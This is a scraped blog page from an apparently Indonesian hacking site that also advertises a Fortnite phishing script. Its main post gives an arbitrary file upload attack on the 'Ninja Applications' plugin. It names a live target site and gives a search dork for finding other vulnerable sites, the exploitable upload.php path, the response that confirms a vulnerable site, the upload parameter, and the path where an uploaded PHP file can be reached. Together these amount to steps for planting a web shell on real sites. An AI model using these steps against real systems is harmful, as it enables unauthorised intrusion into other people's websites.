Labels

Powered by Blogger.

ur-solution

chase what you want

Featured Post

Script Phising Fortnite - Redeem Season 8

Script Phising Fortnite - Redeem Season 8 1. Event Display 2. Login Display 3. Display After Login Note : u can...

Search This Blog

Blog Archive

Categories

Backdoor (5) Script (1) Tutorials (12)

Blogger templates

Blogger news

ngewek

haha

Recent Posts

About

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel

Ninja Applications Arbitrary File Upload

Ninja Applications Arbitrary File Upload



Live TARGET : https://stickeroid.com/
Dork : inurl:/ninja-applications/fufu/
exloit :/ninja-applications/fufu/controllers/uploader/upload.php
example : https://stickeroid.com
/ninja-applications/fufu/controllers/uploader/upload.php

Vuln:
{"jsonrpc" : "2.0", "result" : null, "id" : "id", "cleanFileName" : ""}


























Upload With CSRF 
Paramter :"file"
access ur file in : /uploads/temp/randomname.php


Thank For Visit :D